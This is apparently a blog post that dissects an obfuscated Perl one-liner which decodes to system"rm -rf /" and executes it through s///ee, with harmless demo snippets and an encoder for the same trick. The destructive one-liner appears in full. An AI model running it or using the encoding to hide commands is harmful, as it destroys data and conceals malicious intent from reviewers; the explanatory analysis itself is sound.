Analyzing a dangerous Perl snippet

I came across this Perl one-liner that supposedly results in the system running rm -rf /, i.e., asking it to delete every file on the machine. On a modern machine this probably won't work, because an ordinary user doesn't have the permissions to remove everything, but I'm not going to try it, and I suggest you don't try it either. Do not run this code.

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Now, Perl is a weird language. I used to love it, but then got fed up with its idiosyncrasies, and also with how the maintainers of Perldoc (the documentation system and documentation site) completely broke all hyperlinks on their website, which made navigating the documentation frustrating, and didn't fix it for years, until it was replaced by another guy's implementation.

Perl has a lot of implicit defaults and shortcuts that make short programs more powerful, but they're also the reason I eventually got fed up with it; the longer a program becomes, the less useful these defaults are. And forget doing anything with Unicode and staying short and sweet; the language is from the '90s, and while it has rather good Unicode support now, you still have to explicitly ask for it with binmode(STDOUT, ':utf8') and stuff. Anyway.

Let's start the analysis, going left to right.

The first bit, perl -e, just calls the Perl interpreter; -e means "use this next argument as the code to run".

My analysis of the structure of the program is in the following tree, with strings and regular expressions colored and underlined, and delimiters (like in s/re/repl/) colored and bolded:

$?
  ?
    s : ;s : s;;$? :
  :
    s ; ; =]=>%-{<-|}<&|`{ ;
;
y ;  -/:-@[-`{-} ; `-{/" - ; ;
s ; ; $_ ; s ee

The program consists of only three top-level statements:

  1. First is a ternary expression: "if $? is true-ish, evaluate s:::, else evaluate s;;;". Both branches are string substitution operators, s///, but with uncommon delimiters instead of the typical slash. The $? variable, also known under its long name of $CHILD_ERROR, is a built-in variable containing the exit status of the last-run child process, typically 0 if it ran successfully.
  2. Next is a transliteration operator, tr///, but under its other name of y/// and with an uncommon delimiter instead of the usual slash. This works much like the tr Unix program, swapping one set of characters for another.
  3. Finally, there's another substitution operator, written with semicolon delimiters instead of slashes, but with the additional modifiers s and ee at the end. The s modifier is defined as "treat string as single line; make . match a newline", and can appear with other regex-like operators; it's quite common and harmless here, in fact useless: the program works without it. The ee modifier is specific to the s/// operator, and is the most critical part of this program: it means "evaluate the right side as a string, then eval the result". This is what causes the code to execute "rm" on your system: the "right side" is evaluated to the text of a system() function call, and then that text is executed.
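
The unusual delimiters look scarier than they are. Here's a minimal sketch on harmless text (the sample strings and variable names are made up for illustration) showing that the choice of delimiter doesn't change what s/// or y/// does:

```perl
use strict;
use warnings;

my ($slash, $colon, $semi) = ('a-b') x 3;

$slash =~ s/-/+/;   # the usual spelling
$colon =~ s:-:+:;   # colons as delimiters
$semi  =~ s;-;+;;   # semicolons as delimiters; the last ; ends the statement

print "$slash $colon $semi\n";   # a+b a+b a+b

# y/// is just another name for tr///.
(my $upper = 'abc') =~ y;a-c;A-C;;
print "$upper\n";                # ABC

# In a fresh perl that has run no child process, $? is 0,
# so a ternary on it picks the second branch.
my $branch = $? ? 'first' : 'second';
print "$branch\n";               # second
```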

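To show that the final ee is the dangerous part, just remove it and replace it with ;print. The program then prints the text it would otherwise have run, system"rm -rf /", although it appears twice, as system"rm -rf /"system"rm -rf /", because the replacement is prepended to the copy already in $_: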

$ perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;s;print' ; echo
system"rm -rf /"system"rm -rf /"
$

The first substitution, run on its own, produces nothing, at least on my system:
perl -e 's:;s:s;;$?:;print'
→ no output. Not especially surprising: in the full program it typically isn't run at all ($? is 0 when perl starts, before any child process has run), and even when it is run, the $_ variable is empty, so the substitution doesn't find anything to substitute.

If the dear reader is unfamiliar with Perl, the $_ or $ARG variable is sort of the "default variable", or a scratch space, or kind of like an accumulator in many computer architectures: if no other variable is specified, then input or output from functions and operators (and these substitutions like s/// and y/// are classified as operators, "quote-like operators") comes from or goes to $_, or its array counterpart @_. (In particular, the only way a function ("subroutine") can access its arguments is by looking in @_, and because Perl is weird the first element of @_ is called $_[0], because the element itself is a scalar (hence $) despite being in an array (@)... this is why I quit.) What's relevant for this analysis is that the s/// operator performs its substitution on whatever is in $_, replacing the text in there with the result of the substitution.
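
To make the "default variable" idea concrete, here's a small sketch with made-up sample text: the same substitution, once bound to a named variable with =~ and once left to fall back on $_.

```perl
use strict;
use warnings;

# Explicit target: the operator is bound to $text with =~.
my $text = 'hello world';
$text =~ s/world/there/;
print "$text\n";          # hello there

# No target given: s/// and print both fall back to $_.
$_ = 'hello world';
s/world/there/;
print;                    # hello there (print adds no newline)
print "\n";
```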

The next part does produce output, as long as one doesn't copy the line from my expansion above, since whitespace breaks it. It's a substitution operator, matching an empty string, and $_ is empty, so it becomes the text on the right side. (I use -E to provide the say function, which adds a newline.)

$ perl -E 's;;=]=>%-{<-|}<&|`{;;say'
=]=>%-{<-|}<&|`{

The program has now stuffed some text into $_. The next statement is the y/// transliteration statement, working very much like the Unix program tr, "transliterating" one set of characters (the search list) into another set (the replacement list). (And yes, these are not sets in the mathematical sense, but lists; ordering is very important.)

The syntax for describing these lists can use ranges: mark the first character, add a hyphen, then the last character, and the hyphen then stands for every character in between. Implementations differ in how they deal with stuff like Unicode, whether they handle bytes or characters, but in this case the difference is moot, since we're only in the basic ASCII range. (Characters are just numbers, so "in between" is in the mathematical sense: character 36 ("$") is between characters 35 ("#") and 37 ("%"), although from a non-computer-person's perspective there's no way to order these.)
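
A quick sketch of the "characters are just numbers" point, using the three characters from the parenthesis above and a made-up sample string:

```perl
use strict;
use warnings;

# ord() gives a character's code; "between" just means numerically between.
printf "%s is character %d\n", $_, ord($_) for '#', '$', '%';

# The range #-% therefore covers '#', '$' and '%'.
# The replacement list is shorter, so its last character is reused.
my $sample = 'a#b$c%d';
(my $marked = $sample) =~ tr/#-%/*/;
print "$marked\n";   # a*b*c*d
```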

y; -/:-@[-`{-};`-{/" -;

Let's investigate these two lists of characters. I'll mark down the codes of each character as well (in decimal), since it's relevant.

The search list has four ranges: from space (character number 32) to slash (number 47), from colon (58) to at sign (64), from left square bracket (91) to backtick (96), and from left curly brace (123) to right curly brace (125). Here's a small ASCII table (with boxes in place of special characters and ␣ where space should be), with the search range highlighted:

30  □ □ ␣ ! " # $ % & '
40  ( ) * + , - . / 0 1
50  2 3 4 5 6 7 8 9 : ;
60  < = > ? @ A B C D E
70  F G H I J K L M N O
80  P Q R S T U V W X Y
90  Z [ \ ] ^ _ ` a b c
100 d e f g h i j k l m
110 n o p q r s t u v w
120 x y z { | } ~ □ □ □

Very interestingly, everything except the digits, letters and the tilde (character number 126) has been marked. The full list of characters therefore is ␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|}. There are exactly 32 characters in the list.

The replacement list is one range and a bunch of extra characters: from backtick (character 96) to the left curly brace (123), and the additional characters slash (47), quotemark (34), space (32) and dash (45). The dash here does mean a literal dash: since it's at the end of the list, it doesn't mean a range. (It adds to the obfuscation, however: it looks like the range from space to semicolon.) The fully expanded replacement list is also 32 characters; they are `abcdefghijklmnopqrstuvwxyz{/" -.
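
The counting can be double-checked mechanically. This is only a sketch: span is a hypothetical helper of mine that expands one first-to-last range by character code, which is how I understand the ranges to work in the ASCII range.

```perl
use strict;
use warnings;

# Hypothetical helper: every character from $from to $to, by character code.
sub span {
    my ($from, $to) = @_;
    return join '', map { chr($_) } ord($from) .. ord($to);
}

# The four search ranges, and the one replacement range plus its four extras.
my $search  = span(' ', '/') . span(':', '@') . span('[', '`') . span('{', '}');
my $replace = span('`', '{') . '/" -';

printf "%d search characters, %d replacement characters\n",
    length($search), length($replace);   # 32 and 32
print "$search\n$replace\n";
```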

When I first saw that the structure of the program was essentially just an obfuscated way of creating a string, then transliterating it, then an obfuscated way of executing it, I had a hunch about how it worked. The string in $_ is a bunch of punctuation, and the transliteration operator turns punctuation into letters. Here's the full translation table:

␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/"␣-

And here's the string, in its original form and translated:

=]=>%-{<-|}<&|`{
system"rm -rf /"
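
The translation can be reproduced without any risk, because transliterating and printing a string never runs it. A sketch, using the tr(...)(...) spelling with parentheses as delimiters; the variable names are mine:

```perl
use strict;
use warnings;

my $obfuscated = '=]=>%-{<-|}<&|`{';

# Copy first, then transliterate the copy. The text is only printed, never run.
(my $decoded = $obfuscated) =~ tr( -/:-@[-`{-})(`-{/" -);

print "$decoded\n";   # system"rm -rf /"
```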

After the transliteration, there's a final substitution: s;;$_;see. The $_ variable is already filled with system"rm -rf /"; the regular expression part of the s-operator is empty, so it matches the start of the string (s//a/ adds an a to the start of a string), and replaces it with $_, which is why, if you remove the ee from the end and inspect the program state, $_ is filled with two copies of the same text.
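
The doubling is easy to reproduce with a harmless word in place of the real text (a sketch, with sample strings of my own choosing):

```perl
use strict;
use warnings;

# An empty pattern matches at the very start, so the replacement is prepended.
my $word = 'bc';
$word =~ s//a/;
print "$word\n";      # abc

# With $_ as both the target and the replacement, the text ends up doubled.
$_ = 'echo';
s;;$_;;
print "$_\n";         # echoecho
```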

The ee is, as mentioned before, the crux of the program: it evaluates text as a snippet of a Perl program, or, as the documentation puts it: "Evaluate the right side as a string then eval the result". The term "right side" is a bit confusing here, but I believe it refers to the replacement part of the expression itself. Also confusing are the terms "evaluate as a string" and "eval", which do not mean the same thing: the replacement $_ is first evaluated as an ordinary expression, yielding a string, and that string is then compiled and run as Perl code by eval.
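
Here's how I understand the difference between no modifier, e and ee, sketched with a harmless arithmetic expression standing in for the decoded text (the variable names are mine):

```perl
use strict;
use warnings;

my $expr = '6 * 7';   # harmless stand-in for the decoded text

(my $none  = '') =~ s//$expr/;     # plain: $expr is interpolated as text
(my $once  = '') =~ s//$expr/e;    # e: the replacement is the Perl expression $expr
(my $twice = '') =~ s//$expr/ee;   # ee: that value is then eval'ed as Perl code

print "$none | $once | $twice\n";  # 6 * 7 | 6 * 7 | 42
```

Only the ee version ever treats the contents of the string as code, which is why removing it defuses the one-liner.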

This completes my analysis.


The reverse of the transliterator is y;`-{/" -; -/:-@[-`{-};, or, in a clearer form, tr(`-{/" -)( -/:-@[-`{-}), or, if you really prefer slashes, tr/`-{\/" -/ -\/:-@[-`{-}/, or, using the tr program, where the slash needs no escaping, tr '`-{/" -' ' -/:-@[-`{-}'.

=%#?<)>]|>(</?'(|/"=#?<)>]| /[/`
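
A sketch of the round trip, with encode and decode as hypothetical helper names wrapping the two transliterations; the same decode helper can be pointed at the line above. Only lowercase letters and the few punctuation characters in the replacement list get translated; everything else passes through unchanged.

```perl
use strict;
use warnings;

# Hypothetical helpers; the tr lists are the ones given in the text.
sub encode { my ($s) = @_; $s =~ tr(`-{/" -)( -/:-@[-`{-}); return $s; }
sub decode { my ($s) = @_; $s =~ tr( -/:-@[-`{-})(`-{/" -); return $s; }

my $plain  = 'say "hi"';
my $hidden = encode($plain);

print "$hidden\n";             # =!]|{(){
print decode($hidden), "\n";   # say "hi"
```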


I find this very confusing:

Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. Code in BEGIN blocks executes at run time but in the compile phase.

Wikipedia
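
A small experiment helps me untangle the quote. This is only a sketch: it records the order in which things execute, with one BEGIN block in the main program and one inside a string handed to eval.

```perl
use strict;
use warnings;

our @order;

push @order, 'main program runs';
BEGIN { push @order, 'BEGIN block runs' }   # executes during the compile phase
eval q{
    BEGIN { push @order, 'BEGIN inside eval runs' }   # compiled during the run phase
    push @order, 'eval body runs';
};
die $@ if $@;

print "$_\n" for @order;
# BEGIN block runs
# main program runs
# BEGIN inside eval runs
# eval body runs
```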